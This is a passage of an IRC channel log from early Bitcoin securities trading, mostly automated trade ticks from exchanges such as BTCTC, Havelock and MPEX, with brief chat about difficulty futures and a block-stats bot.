[BTCGARDEN] 200 @ 0.01671 = 3.342 BTC [+] Aug 04 18:05:40 [BTCTC] [BTCGARDEN] 9 @ 0.01673 = 0.1506 BTC [+] Aug 04 18:06:14 [BTCTC] [BTCGARDEN] 184 @ 0.0165 = 3.036 BTC [-] Aug 04 18:06:23 [BTCTC] [ASICMINER-PT] 7 @ 4.013 = 28.091 BTC [-] Aug 04 18:06:24 [BTCTC] [ASICMINER-PT] 2 @ 4.012 = 8.024 BTC [-] Aug 04 18:06:26 [BTCTC] [ASICMINER-PT] 1 @ 4.012 BTC [-] Aug 04 18:06:28 [BTCTC] [ASICMINER-PT] 8 @ 4.01 = 32.08 BTC [-] Aug 04 18:08:15 [BTCTC] [BTCGARDEN] 6 @ 0.01673 = 0.1004 BTC [+] Aug 04 18:08:17 [BTCTC] [BTCGARDEN] 1 @ 0.01679 BTC [+] Aug 04 18:08:18 [BTCTC] [BTCGARDEN] 446 @ 0.01686 = 7.5196 BTC [+] Aug 04 18:08:19 [BTCTC] [BTCGARDEN] 47 @ 0.0169 = 0.7943 BTC [+] Aug 04 18:09:51 [BTCTC] [LABCOIN] 6 @ 0.001799 = 0.0108 BTC [+] Aug 04 18:09:52 [BTCTC] [LABCOIN] 33 @ 0.0018 = 0.0594 BTC [+] Aug 04 18:09:53 [BTCTC] [LABCOIN] 3 @ 0.001801 = 0.0054 BTC [+] Aug 04 18:09:54 [BTCTC] [LABCOIN] 3 @ 0.001802 = 0.0054 BTC [+] Aug 04 18:09:55 [BTCTC] [LABCOIN] 23 @ 0.001803 = 0.0415 BTC [+] Aug 04 18:09:56 [BTCTC] [LABCOIN] 8 @ 0.001804 = 0.0144 BTC [+] Aug 04 18:09:57 [BTCTC] [LABCOIN] 50 @ 0.001805 = 0.0903 BTC [+] Aug 04 18:09:58 [BTCTC] [LABCOIN] 166 @ 0.001807 = 0.3 BTC [+] Aug 04 18:10:00 [BTCTC] [LABCOIN] 500 @ 0.001808 = 0.904 BTC [+] Aug 04 18:10:01 [BTCTC] [LABCOIN] 500 @ 0.001809 = 0.9045 BTC [+] Aug 04 18:10:32 [BTCTC] [LABCOIN] 10 @ 0.001824 = 0.0182 BTC [+] Aug 04 18:10:33 [BTCTC] [LABCOIN] 60 @ 0.001825 = 0.1095 BTC [+] Aug 04 18:10:35 [BTCTC] [LABCOIN] 183 @ 0.001842 = 0.3371 BTC [+] Aug 04 18:10:35 [BTCTC] [LABCOIN] 205 @ 0.001843 = 0.3778 BTC [+] Aug 04 18:13:56 [BTCTC] [DMS.MINING] 7 @ 0.0084 = 0.0588 BTC [+] Aug 04 18:14:31 [HAVELOCK] [XBOND] 2633 @ 0.001043 = 2.7462 BTC [-] Aug 04 18:14:34 [HAVELOCK] [XBOND] 88 @ 0.00104499 = 0.092 BTC [+] Aug 04 18:14:36 [HAVELOCK] [XBOND] 25 @ 0.001049 = 0.0262 BTC [+] Aug 04 18:14:38 [HAVELOCK] [XBOND] 1369 @ 0.0010497 = 1.437 BTC [+] Aug 04 18:14:40 [HAVELOCK] [XBOND] 45 @ 0.00104985 = 0.0472 BTC [+] Aug 04 18:14:43 [HAVELOCK] [XBOND] 3282 @ 0.0010499 = 3.4458 BTC [+] Aug 04 18:14:45 [HAVELOCK] [XBOND] 4000 @ 0.00104999 = 4.2 BTC [+] Aug 04 18:14:47 [HAVELOCK] [XBOND] 38558 @ 0.00105 = 40.4859 BTC [+] Aug 04 18:14:49 [BTCTC] [ACTIVEMINING] 25 @ 0.006319 = 0.158 BTC [+] Aug 04 18:15:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.03999 = 0.16 BTC [+] Aug 04 18:15:06 [BTCTC] [TAT.ASICMINER] 35 @ 0.04 = 1.4 BTC [+] Aug 04 18:15:07 [BTCTC] [TAT.ASICMINER] 35 @ 0.04 = 1.4 BTC [+] Aug 04 18:15:08 [BTCTC] [TAT.ASICMINER] 80 @ 0.04 = 3.2 BTC [+] Aug 04 18:22:03 jurov: maybe i missed it, but what is the starting price for CB.IDIFF-O? Aug 04 18:29:52 [BTCTC] [DMS.MINING] 3 @ 0.0084 = 0.0252 BTC [+] Aug 04 18:30:43 [BTCTC] [RSM] 1 @ 0.011 BTC [-] Aug 04 18:30:45 [BTCTC] [RSM] 50 @ 0.01025 = 0.5125 BTC [-] Aug 04 18:30:59 [BTCTC] [TAT.MINIGAME] 1 @ 0.000255 BTC [+] Aug 04 18:33:29 [BTCTC] [DMS.PURCHASE] 20 @ 0.03387 = 0.6774 BTC [+] Aug 04 18:34:01 [BTCTC] [ASICMINER-PT] 1 @ 4.09 BTC [+] Aug 04 18:34:03 [BTCTC] [ASICMINER-PT] 7 @ 4.099 = 28.693 BTC [+] Aug 04 18:34:36 [BTCTC] [DMS.MINING] 2 @ 0.0085 = 0.017 BTC [+] Aug 04 18:35:59 [HAVELOCK] [XBOND] 5 @ 0.001045 = 0.0052 BTC [-] Aug 04 18:37:46 [HAVELOCK] [SMG] 10 @ 0.000244 = 0.0024 BTC [-] Aug 04 18:38:24 [HAVELOCK] [SMG] 25 @ 0.0002444 = 0.0061 BTC [+] Aug 04 18:38:49 [HAVELOCK] [AM1] 1 @ 4 BTC [-] Aug 04 18:39:22 [HAVELOCK] [AM1] 1 @ 3.96000001 BTC [-] Aug 04 18:40:40 [BTCTC] [LABCOIN] 563 @ 0.001802 = 1.0145 BTC [-] Aug 04 18:41:44 [BTCTC] [LABCOIN] 2324 @ 0.001802 = 4.1878 BTC [-] Aug 04 18:42:41 [HAVELOCK] [XBOND] 1 @ 0.00105 BTC [+] Aug 04 18:47:03 [HAVELOCK] [XBOND] 3 @ 0.00105 = 0.0032 BTC [+] Aug 04 18:47:16 [BTCTC] [ACTIVEMINING] 1 @ 0.006286 BTC [-] Aug 04 18:47:45 [HAVELOCK] [XBOND] 1 @ 0.00105 BTC [+] Aug 04 18:51:34 [BTCTC] [TAT.ASICMINER] 9 @ 0.0404 = 0.3636 BTC [+] Aug 04 18:52:30 [HAVELOCK] [XBOND] 10 @ 0.00105 = 0.0105 BTC [+] Aug 04 18:53:07 [BTCTC] [DMS.MINING] 8 @ 0.0085 = 0.068 BTC [+] Aug 04 18:53:09 [BTCTC] [DMS.MINING] 20 @ 0.0086 = 0.172 BTC [+] Aug 04 18:53:10 [BTCTC] [DMS.MINING] 8 @ 0.00865 = 0.0692 BTC [+] Aug 04 18:54:57 [BTCTC] [DMS.MINING] 6 @ 0.008669 = 0.052 BTC [+] Aug 04 19:00:07 [MPEX] [S.MPOE] 1152 @ 0.0008239 = 0.9491 BTC [-] Aug 04 19:00:08 [MPEX] [S.MPOE] 4198 @ 0.00082303 = 3.4551 BTC [-] Aug 04 19:01:40 [HAVELOCK] [XBOND] 44 @ 0.00103 = 0.0453 BTC [-] Aug 04 19:03:30 [BTCTC] [LABCOIN] 377 @ 0.001805 = 0.6805 BTC [+] Aug 04 19:03:31 [BTCTC] [LABCOIN] 1572 @ 0.001802 = 2.8327 BTC [-] Aug 04 19:03:32 [BTCTC] [LABCOIN] 50 @ 0.0018 = 0.09 BTC [-] Aug 04 19:05:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0405 BTC [+] Aug 04 19:06:32 [BTCTC] [LABCOIN] 1 @ 0.00178 BTC [-] Aug 04 19:06:34 [BTCTC] [LABCOIN] 2 @ 0.001761 = 0.0035 BTC [-] Aug 04 19:06:35 [BTCTC] [LABCOIN] 15 @ 0.00176 = 0.0264 BTC [-] Aug 04 19:06:36 [BTCTC] [LABCOIN] 406 @ 0.001743 = 0.7077 BTC [-] Aug 04 19:06:37 [BTCTC] [LABCOIN] 1976 @ 0.001742 = 3.4422 BTC [-] Aug 04 19:07:31 [BTCTC] [DMS.SELLING] 19 @ 0.0259 = 0.4921 BTC [+] Aug 04 19:07:33 [BTCTC] [DMS.SELLING] 20 @ 0.0259 = 0.518 BTC [+] Aug 04 19:07:34 [BTCTC] [DMS.SELLING] 30 @ 0.02639 = 0.7917 BTC [+] Aug 04 19:07:35 [BTCTC] [DMS.SELLING] 80 @ 0.0264 = 2.112 BTC [+] Aug 04 19:08:42 [BTCTC] [DMS.SELLING] 9 @ 0.0264 = 0.2376 BTC [+] Aug 04 19:08:55 [HAVELOCK] [HIM] 1 @ 0.151 BTC [+] Aug 04 19:09:08 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [+] Aug 04 19:09:19 [HAVELOCK] [XBOND] 3 @ 0.00105 = 0.0032 BTC [+] Aug 04 19:09:51 [HAVELOCK] [XBOND] 25 @ 0.00105 = 0.0263 BTC [+] Aug 04 19:10:40 [BTCTC] [DMS.SELLING] 500 @ 0.02433 = 12.165 BTC [-] Aug 04 19:10:43 [BTCTC] [DMS.SELLING] 38 @ 0.02433 = 0.9245 BTC [-] Aug 04 19:10:45 [BTCTC] [DMS.SELLING] 20 @ 0.02433 = 0.4866 BTC [-] Aug 04 19:10:46 [BTCTC] [DMS.SELLING] 5 @ 0.024 = 0.12 BTC [-] Aug 04 19:10:48 [BTCTC] [DMS.SELLING] 5 @ 0.0236 = 0.118 BTC [-] Aug 04 19:10:50 [BTCTC] [DMS.SELLING] 21 @ 0.02331 = 0.4895 BTC [-] Aug 04 19:10:51 [BTCTC] [DMS.SELLING] 5 @ 0.0233 = 0.1165 BTC [-] Aug 04 19:10:54 [BTCTC] [DMS.SELLING] 15 @ 0.0232 = 0.348 BTC [-] Aug 04 19:10:56 [BTCTC] [DMS.SELLING] 38 @ 0.02296 = 0.8725 BTC [-] Aug 04 19:10:58 [BTCTC] [DMS.SELLING] 2 @ 0.02204 = 0.0441 BTC [-] Aug 04 19:11:02 [BTCTC] [DMS.SELLING] 11 @ 0.02183 = 0.2401 BTC [-] Aug 04 19:11:06 [BTCTC] [DMS.SELLING] 34 @ 0.02176 = 0.7398 BTC [-] Aug 04 19:11:17 [BTCTC] [DMS.SELLING] 14 @ 0.021 = 0.294 BTC [-] Aug 04 19:12:38 [BTCTC] [ACTIVEMINING] 25 @ 0.006243 = 0.1561 BTC [-] Aug 04 19:12:39 [BTCTC] [ACTIVEMINING] 24 @ 0.006244 = 0.1499 BTC [+] Aug 04 19:12:40 [BTCTC] [ACTIVEMINING] 21 @ 0.006246 = 0.1312 BTC [+] Aug 04 19:12:41 [BTCTC] [ACTIVEMINING] 50 @ 0.006248 = 0.3124 BTC [+] Aug 04 19:12:42 [BTCTC] [ACTIVEMINING] 273 @ 0.006314 = 1.7237 BTC [+] Aug 04 19:12:43 [BTCTC] [ACTIVEMINING] 67 @ 0.006315 = 0.4231 BTC [+] Aug 04 19:12:51 [BTCTC] [LABCOIN] 77 @ 0.001743 = 0.1342 BTC [+] Aug 04 19:12:52 [BTCTC] [LABCOIN] 50 @ 0.001743 = 0.0872 BTC [+] Aug 04 19:12:54 [BTCTC] [LABCOIN] 99 @ 0.001742 = 0.1725 BTC [-] Aug 04 19:14:35 [BTCTC] [DMS.SELLING] 41 @ 0.0205 = 0.8405 BTC [-] Aug 04 19:14:54 dexX7:hi, it will be 0.00750, we plan to make same offers as on bitfunder Aug 04 19:16:06 [BTCTC] [BTCGARDEN] 33 @ 0.01655 = 0.5462 BTC [-] Aug 04 19:16:08 [BTCTC] [BTCGARDEN] 1 @ 0.01655 BTC [-] Aug 04 19:16:12 [BTCTC] [BTCGARDEN] 166 @ 0.0165 = 2.739 BTC [-] Aug 04 19:16:25 [BTCTC] [ACTIVEMINING] 25 @ 0.006107 = 0.1527 BTC [-] Aug 04 19:16:27 [BTCTC] [ACTIVEMINING] 6 @ 0.006106 = 0.0366 BTC [-] Aug 04 19:16:28 [BTCTC] [ACTIVEMINING] 41 @ 0.006105 = 0.2503 BTC [-] Aug 04 19:16:28 [BTCTC] [ACTIVEMINING] 50 @ 0.006104 = 0.3052 BTC [-] Aug 04 19:16:29 [BTCTC] [ACTIVEMINING] 114 @ 0.0061 = 0.6954 BTC [-] Aug 04 19:16:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.0404 = 0.1616 BTC [-] Aug 04 19:18:28 [BTCTC] [TAT.ASICMINER] 21 @ 0.0405 = 0.8505 BTC [+] Aug 04 19:18:29 [BTCTC] [TAT.ASICMINER] 35 @ 0.0408 = 1.428 BTC [+] Aug 04 19:19:15 jurov: is it possible to make an MPB-PT on CoinBR? Aug 04 19:20:11 o and everyone: please vote on https://btct.co/security/CB.IDIFF-O Aug 04 19:20:37 [BTCTC] [DMS.SELLING] 35 @ 0.0208 = 0.728 BTC [+] Aug 04 19:20:38 thestringpuller: what do you mean? Aug 04 19:21:45 [BTCTC] [LTC-ATF.B2] 10 @ 0.01012 = 0.1012 BTC [-] Aug 04 19:21:47 [BTCTC] [LTC-ATF.B2] 1 @ 0.01012 BTC [-] Aug 04 19:21:58 [BTCTC] [LTC-ATF.B2] 1 @ 0.01011 BTC [-] Aug 04 19:22:07 [BTCTC] [DMS.PURCHASE] 24 @ 0.02824 = 0.6778 BTC [-] Aug 04 19:22:19 [BTCTC] [BTCGARDEN] 7 @ 0.01677 = 0.1174 BTC [+] Aug 04 19:22:37 [BTCTC] [DMS.PURCHASE] 200 @ 0.02824 = 5.648 BTC [-] Aug 04 19:23:28 jurov: maybe i missed it, but what is the starting price for CB.IDIFF-O? Aug 04 19:23:46 [BTCTC] [DMS.SELLING] 50 @ 0.0207 = 1.035 BTC [-] Aug 04 19:23:47 [BTCTC] [DMS.SELLING] 6 @ 0.0208 = 0.1248 BTC [+] Aug 04 19:23:50 it will be 0.00750, we plan to make same offers as on bitfunder Aug 04 19:24:04 so it's roughly current hashrate x 2? Aug 04 19:24:15 yes atm Aug 04 19:24:18 thanks Aug 04 19:25:27 [BTCTC] [BTCGARDEN] 39 @ 0.01651 = 0.6439 BTC [-] Aug 04 19:25:28 [BTCTC] [BTCGARDEN] 96 @ 0.0165 = 1.584 BTC [-] Aug 04 19:25:30 [BTCTC] [BTCGARDEN] 17 @ 0.0165 = 0.2805 BTC [-] Aug 04 19:25:31 [BTCTC] [BTCGARDEN] 461 @ 0.01625 = 7.4913 BTC [-] Aug 04 19:25:32 [BTCTC] [BTCGARDEN] 480 @ 0.01625 = 7.8 BTC [-] Aug 04 19:25:33 [BTCTC] [BTCGARDEN] 500 @ 0.01624 = 8.12 BTC [-] Aug 04 19:25:35 [BTCTC] [BTCGARDEN] 80 @ 0.01623 = 1.2984 BTC [-] Aug 04 19:25:36 [BTCTC] [BTCGARDEN] 822 @ 0.01622 = 13.3328 BTC [-] Aug 04 19:26:38 [BTCTC] [DMS.PURCHASE] 3 @ 0.02824 = 0.0847 BTC [-] Aug 04 19:27:42 [BTCTC] [DMS.SELLING] 1 @ 0.0208 BTC [+] Aug 04 19:27:59 [BTCTC] [DMS.SELLING] 19 @ 0.0208 = 0.3952 BTC [+] Aug 04 19:28:24 [BTCTC] [DMS.SELLING] 39 @ 0.0208 = 0.8112 BTC [+] Aug 04 19:28:25 [BTCTC] [DMS.SELLING] 20 @ 0.0208 = 0.416 BTC [+] Aug 04 19:28:50 [BTCTC] [BASIC-MINING] 1 @ 0.3871 BTC [+] Aug 04 19:28:52 [BTCTC] [BASIC-MINING] 2 @ 0.387 = 0.774 BTC [-] Aug 04 19:28:54 [BTCTC] [DMS.SELLING] 2 @ 0.021 = 0.042 BTC [+] Aug 04 19:30:41 [BTCTC] [LABCOIN] 2 @ 0.001808 = 0.0036 BTC [+] Aug 04 19:30:41 ;;bc,stats Aug 04 19:30:43 Current Blocks: 250182 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1817 blocks | Next Difficulty In About: 1 week, 4 days, 8 hours, 33 minutes, and 0 seconds | Next Difficulty Estimate: 42133295.7527 | Estimated Percent Change: 12.67766 Aug 04 19:31:07 [BTCTC] [DMS.SELLING] 330 @ 0.021 = 6.93 BTC [+] Aug 04 19:31:08 [BTCTC] [DMS.SELLING] 3 @ 0.021 = 0.063 BTC [+] Aug 04 19:31:11 [BTCTC] [DMS.SELLING] 1565 @ 0.0212 = 33.178 BTC [+] Aug 04 19:31:45 [BTCTC] [KENILWORTH] 1 @ 0.001798 BTC [-] Aug 04 19:33:22 [BTCTC] [DMS.SELLING] 37 @ 0.0212 = 0.7844 BTC [+] Aug 04 19:36:19 [BTCTC] [TAT.ASICMINER] 80 @ 0.0404 = 3.232 BTC [-] Aug 04 19:36:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0404 BTC [-] Aug 04 19:37:12 "I've never heard of BTCGarden and I bought 2012 stocks." Aug 04 19:37:34 jurov: nvm. are the diff futures still on bitfunder? Aug 04 19:37:52 yes, they will be on both bf and btct Aug 04 19:38:35 what are they called IDIFF? Aug 04 19:38:40 or are they no on there at the moment? Aug 04 19:38:44 sorry for being a n00b Aug 04 19:39:21 because mp was first: http://mpex.co/?mpsic=X.IDIFF.SEP&r=1 Aug 04 19:39:51 so i named mine similarly, there are some difference but can be directly compared Aug 04 19:39:52 yea I know MP has IDIFF futures but I thought you offered difficulty futurues Aug 04 19:40:04 it's the same thing :) Aug 04 19:40:20 Well I'm not seeing the diff futures on BF Aug 04 19:40:46 i wanted to see if they had more depth than mpex like when you offered them every month back in the fall Aug 04 19:40:57 / winter Aug 04 19:41:09 [BTCTC] [COGNITIVE] 1 @ 0.4402 BTC [+] Aug 04 19:41:22 "I've never heard of BTCGarden and I bought 2012 stocks." lol Aug 04 19:41:32 https://bitfunder.com/asset/CoinBr.iDiff-O Aug 04 19:41:34 BitFunder.Com - Join the crowd, every BIT helps Aug 04 19:42:00 ^^ thestringpuller. and these i'm marketmaking so there's always some depth Aug 04 19:42:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.03913 = 0.1565 BTC [-] Aug 04 19:42:30 the diff stands for difficulty. Aug 04 19:43:43 [HAVELOCK] [XBOND] 30 @ 0.00105 = 0.0315 BTC [+] Aug 04 19:44:46 oh wow these have a lot of depth Aug 04 19:44:54 [HAVELOCK] [LABCO] 166 @ 0.0018166 = 0.3016 BTC [-] Aug 04 19:45:43 ;;bc,stats Aug 04 19:45:43 [BTCTC] [DMS.SELLING] 63 @ 0.0212 = 1.3356 BTC [+] Aug 04 19:45:45 Current Blocks: 250186 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1813 blocks | Next Difficulty In About: 1 week, 4 days, 2 hours, 56 minutes, and 41 seconds | Next Difficulty Estimate: 42403164.8474 | Estimated Percent Change: 13.39938 Aug 04 19:45:48 [HAVELOCK] [XBOND] 285 @ 0.00105 = 0.2993 BTC [+] Aug 04 19:46:57 [MPEX] [S.MPOE] 3622 @ 0.00083142 = 3.0114 BTC [+] Aug 04 19:46:58 [MPEX] [S.MPOE] 8600 @ 0.00083231 = 7.1579 BTC [+] Aug 04 19:47:02 [MPEX] [S.MPOE] 78 @ 0.00083323 = 0.065 BTC [+] Aug 04 19:47:15 well priced too Aug 04 19:47:16 good shit Aug 04 19:48:21 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Aug 04 19:48:45 [HAVELOCK] [SDSTM] 5 @ 0.0065 = 0.0325 BTC [-] Aug 04 19:49:59 [HAVELOCK] [LABCO] 6 @ 0.0018166 = 0.0109 BTC [-] Aug 04 19:51:52 [HAVELOCK] [LABCO] 1 @ 0.0018166 BTC [-] Aug 04 19:52:25 [BTCTC] [DMS.PURCHASE] 2 @ 0.02824 = 0.0565 BTC [-] Aug 04 19:52:27 [BTCTC] [BTCGARDEN] 3 @ 0.0165 = 0.0495 BTC [+] Aug 04 19:52:29 [BTCTC] [BTCGARDEN] 85 @ 0.01633 = 1.3881 BTC [-] Aug 04 19:52:30 [BTCTC] [BTCGARDEN] 593 @ 0.01622 = 9.6185 BTC [-] Aug 04 19:52:31 [BTCTC] [BTCGARDEN] 50 @ 0.01622 = 0.811 BTC [-] Aug 04 19:52:32 [BTCTC] [BTCGARDEN] 900 @ 0.0162 = 14.58 BTC [-] Aug 04 19:52:34 [BTCTC] [BTCGARDEN] 2 @ 0.0162 = 0.0324 BTC [-] Aug 04 19:52:35 [BTCTC] [BTCGARDEN] 74 @ 0.0162 = 1.1988 BTC [-] Aug 04 19:52:36 [BTCTC] [BTCGARDEN] 47 @ 0.0162 = 0.7614 BTC [-] Aug 04 19:52:37 [BTCTC] [BTCGARDEN] 1000 @ 0.01615 = 16.15 BTC [-] Aug 04 19:52:38 [BTCTC] [BTCGARDEN] 88 @ 0.01613 = 1.4194 BTC [-] Aug 04 19:52:38 [BTCTC] [BTCGARDEN] 220 @ 0.01613 = 3.5486 BTC [-] Aug 04 19:52:39 [BTCTC] [BTCGARDEN] 5 @ 0.01612 = 0.0806 BTC [-] Aug 04 19:52:40 [BTCTC] [BTCGARDEN] 5 @ 0.01611 = 0.0806 BTC [-] Aug 04 19:52:41 [BTCTC] [BTCGARDEN] 68 @ 0.0161 = 1.0948 BTC [-] Aug 04 19:52:42 [BTCTC] [BTCGARDEN] 130 @ 0.0161 = 2.093 BTC [-] Aug 04 19:52:44 [BTCTC] [BTCGARDEN] 1000 @ 0.0161 = 16.1 BTC [-] Aug 04 19:52:45 [BTCTC] [BTCGARDEN] 50 @ 0.01608 = 0.804 BTC [-] Aug 04 19:52:46 [BTCTC] [BTCGARDEN] 200 @ 0.01607 = 3.214 BTC [-] Aug 04 19:52:47 [BTCTC] [BTCGARDEN] 7 @ 0.01606 = 0.1124 BTC [-] Aug 04 19:52:53 [HAVELOCK] [XBOND] 27 @ 0.00105 = 0.0284 BTC [+] Aug 04 19:52:54 [BTCTC] [BTCGARDEN] 30 @ 0.01606 = 0.4818 BTC [-] Aug 04 19:52:56 [BTCTC] [BTCGARDEN] 444 @ 0.01603 = 7.1173 BTC [-] Aug 04 19:52:57 [BTCTC] [BTCGARDEN] 1000 @ 0.01602 = 16.02 BTC [-] Aug 04 19:52:58 [BTCTC] [BTCGARDEN] 12 @ 0.01602 = 0.1922 BTC [-] Aug 04 19:52:59 [BTCTC] [BTCGARDEN] 100 @ 0.01601 = 1.601 BTC [-] Aug 04 19:53:01 [BTCTC] [BTCGARDEN] 1887 @ 0.01601 = 30.2109 BTC [-] Aug 04 19:54:59 [HAVELOCK] [AM100] 5 @ 0.03875 = 0.1938 BTC [-] Aug 04 19:55:37 [BTCTC] [LABCOIN] 4 @ 0.001794 = 0.0072 BTC [-] Aug 04 19:55:38 [BTCTC] [LABCOIN] 25 @ 0.001795 = 0.0449 BTC [+] Aug 04 19:55:40 [BTCTC] [LABCOIN] 1 @ 0.001805 BTC [+] Aug 04 19:55:41 [BTCTC] [LABCOIN] 10 @ 0.001806 = 0.0181 BTC [+] Aug 04 19:55:41 [BTCTC] [LABCOIN] 4 @ 0.001807 = 0.0072 BTC [+] Aug 04 19:55:42 [BTCTC] [LABCOIN] 28 @ 0.001808 = 0.0506 BTC [+] Aug 04 19:55:43 [BTCTC] [LABCOIN] 5 @ 0.001809 = 0.009 BTC [+] Aug 04 19:55:44 [BTCTC] [LABCOIN] 30 @ 0.00181 = 0.0543 BTC [+] Aug 04 19:55:45 [BTCTC] [LABCOIN] 16 @ 0.001818 = 0.0291 BTC [+] Aug 04 19:55:46 [BTCTC] [LABCOIN] 100 @ 0.001819 = 0.1819 BTC [+] Aug 04 19:55:47 [BTCTC] [LABCOIN] 277 @ 0.00182 = 0.5041 BTC [+] Aug 04 19:56:28 [BTCTC] [BTCGARDEN] 3 @ 0.01677 = 0.0503 BTC [+] Aug 04 19:56:30 [BTCTC] [BTCGARDEN] 1 @ 0.01677 BTC [+] Aug 04 19:56:31 [HAVELOCK] [XBOND] 94 @ 0.00105 = 0.0987 BTC [+] Aug 04 19:56:33 [BTCTC] [BTCGARDEN] 36 @ 0.01678 = 0.6041 BTC [+] Aug 04 19:58:52 [BTCTC] [LABCOIN] 25 @ 0.00181 = 0.0453 BTC [-] Aug 04 19:58:53 [BTCTC] [LABCOIN] 1 @ 0.001819 BTC [+] Aug 04 19:58:55 [BTCTC] [LABCOIN] 346 @ 0.00182 = 0.6297 BTC [+] Aug 04 19:58:56 [BTCTC] [LABCOIN] 378 @ 0.001821 = 0.6883 BTC [+] Aug 04 19:59:15 [BTCTC] [DMS.MINING] 15 @ 0.008669 = 0.13 BTC [+] Aug 04 20:00:05 [BTCTC] [DMS.MINING] 10 @ 0.0083 = 0.083 BTC [-] Aug 04 20:01:48 [HAVELOCK] [XBOND] 95 @ 0.00105 = 0.0998 BTC [+] Aug 04 20:03:13 [BTCTC] [DMS.MINING] 5 @ 0.008003 = 0.04 BTC [-] Aug 04 20:03:15 [BTCTC] [DMS.MINING] 5 @ 0.008002 = 0.04 BTC [-] Aug 04 20:05:15 [BTCTC] [MININGCO.ETF] 1 @ 1.95 BTC [+] Aug 04 20:05:17 [BTCTC] [DMS.PURCHASE] 575 @ 0.02824 = 16.238 BTC [-] Aug 04 20:05:30 [BTCTC] [LABCOIN] 15 @ 0.001751 = 0.0263 BTC [-] Aug 04 20:05:30 [BTCTC] [LABCOIN] 6 @ 0.00175 = 0.0105 BTC [-] Aug 04 20:05:32 [BTCTC] [LABCOIN] 83 @ 0.00175 = 0.1453 BTC [-] Aug 04 20:05:33 [BTCTC] [LABCOIN] 2 @ 0.00175 = 0.0035 BTC [-] Aug 04 20:05:34 [BTCTC] [LABCOIN] 2 @ 0.001747 = 0.0035 BTC [-] Aug 04 20:05:35 [BTCTC] [LABCOIN] 13 @ 0.001746 = 0.0227 BTC [-] Aug 04 20:05:37 [BTCTC] [LABCOIN] 80 @ 0.001745 = 0.1396 BTC [-] Aug 04 20:05:38 [BTCTC] [LABCOIN] 67 @ 0.001744 = 0.1168 BTC [-] Aug 04 20:05:39 [BTCTC] [LABCOIN] 100 @ 0.001743 = 0.1743 BTC [-] Aug 04 20:05:40 [BTCTC] [LABCOIN] 365 @ 0.001742 = 0.6358 BTC [-] Aug 04 20:05:41 [BTCTC] [LABCOIN] 693 @ 0.001741 = 1.2065 BTC [-] Aug 04 20:05:41 [BTCTC] [LABCOIN] 5717 @ 0.00174 = 9.9476 BTC [-] Aug 04 20:05:42 [BTCTC] [LABCOIN] 3500 @ 0.001734 = 6.069 BTC [-] Aug 04 20:05:43 [BTCTC] [LABCOIN] 685 @ 0.001733 = 1.1871 BTC [-] Aug 04 20:05:44 [BTCTC] [LABCOIN] 500 @ 0.001732 = 0.866 BTC [-] Aug 04 20:05:46 [BTCTC] [LABCOIN] 673 @ 0.001732 = 1.1656 BTC [-] Aug 04 20:05:47 [BTCTC] [LABCOIN] 150 @ 0.001731 = 0.2597 BTC [-] Aug 04 20:05:48 [BTCTC] [LABCOIN] 653 @ 0.001731 = 1.1303 BTC [-] Aug 04 20:05:49 [BTCTC] [LABCOIN] 4207 @ 0.00173 = 7.2781 BTC [-] Aug 04 20:05:50 [BTCTC] [LABCOIN] 25 @ 0.001725 = 0.0431 BTC [-] Aug 04 20:05:51 [BTCTC] [LABCOIN] 5000 @ 0.001725 = 8.625 BTC [-] Aug 04 20:05:51 [BTCTC] [LABCOIN] 650 @ 0.00172 = 1.118 BTC [-] Aug 04 20:05:52 [BTCTC] [LABCOIN] 7245 @ 0.00172 = 12.4614 BTC [-] Aug 04 20:05:53 [BTCTC] [LABCOIN] 1588 @ 0.00172 = 2.7314 BTC [-] Aug 04 20:05:54 [BTCTC] [LABCOIN] 450 @ 0.001717 = 0.7727 BTC [-] Aug 04 20:05:55 [BTCTC] [LABCOIN] 5676 @ 0.00171 = 9.706 BTC [-] Aug 04 20:05:56 [BTCTC] [LABCOIN] 165 @ 0.00171 = 0.2822 BTC [-] Aug 04 20:05:58 [BTCTC] [LABCOIN] 2918 @ 0.001709 = 4.9869 BTC [-] Aug 04 20:05:59 [BTCTC] [LABCOIN] 25 @ 0.001708 = 0.0427 BTC [-] Aug 04 20:06:00 [BTCTC] [LABCOIN] 19 @ 0.001708 = 0.0325 BTC [-] Aug 04 20:06:01 [BTCTC] [LABCOIN] 100 @ 0.001707 = 0.1707 BTC [-] Aug 04 20:06:02 [BTCTC] [LABCOIN] 500 @ 0.001707 = 0.8535 BTC [-] Aug 04 20:06:02 [BTCTC] [LABCOIN] 500 @ 0.001704 = 0.852 BTC [-] Aug 04 20:06:03 [BTCTC] [LABCOIN] 7628 @ 0.001703 = 12.9905 BTC [-] Aug 04 20:06:20 [BTCTC] [BTCGARDEN] 5 @ 0.01677 = 0.0839 BTC [-] Aug 04 20:06:46 [BTCTC] [DMS.PURCHASE] 10 @ 0.02824 = 0.2824 BTC [-] Aug 04 20:07:42 [BTCTC] [ASICMINER-PT] 20 @ 4.1 = 82 BTC [+] Aug 04 20:08:01 [BTCTC] [DMS.SELLING] 5 @ 0.02119 = 0.106 BTC [-] Aug 04 20:09:52 [BTCTC] [BITVPS] 5 @ 0.002875 = 0.0144 BTC [+] Aug 04 20:12:03 [BTCTC] [DMS.PURCHASE] 10 @ 0.02824 = 0.2824 BTC [-] Aug 04 20:13:35 [HAVELOCK] [XBOND] 400 @ 0.00104999 = 0.42 BTC [-] Aug 04 20:13:38 [HAVELOCK] [XBOND] 19085 @ 0.00105 = 20.0393 BTC [+] Aug 04 20:13:40 [HAVELOCK] [XBOND] 100 @ 0.00105 = 0.105 BTC [+] Aug 04 20:13:42 [HAVELOCK] [XBOND] 50060 @ 0.00105 = 52.563 BTC [+] Aug 04 20:14:35 [BTCTC] [ASICMINER-PT] 1 @ 4.075 BTC [-] Aug 04 20:15:20 [BTCTC] [ASICMINER-PT] 1 @ 4.075 BTC [-] Aug 04 20:16:15 [BTCTC] [ASICMINER-PT] 1 @ 4.075 BTC [-] Aug 04 20:17:39 [BTCTC] [ASICMINER-PT] 1 @ 4.09 BTC [+] Aug 04 20:17:43 [HAVELOCK] [XBOND] 1 @ 0.00107 BTC [+] Aug 04 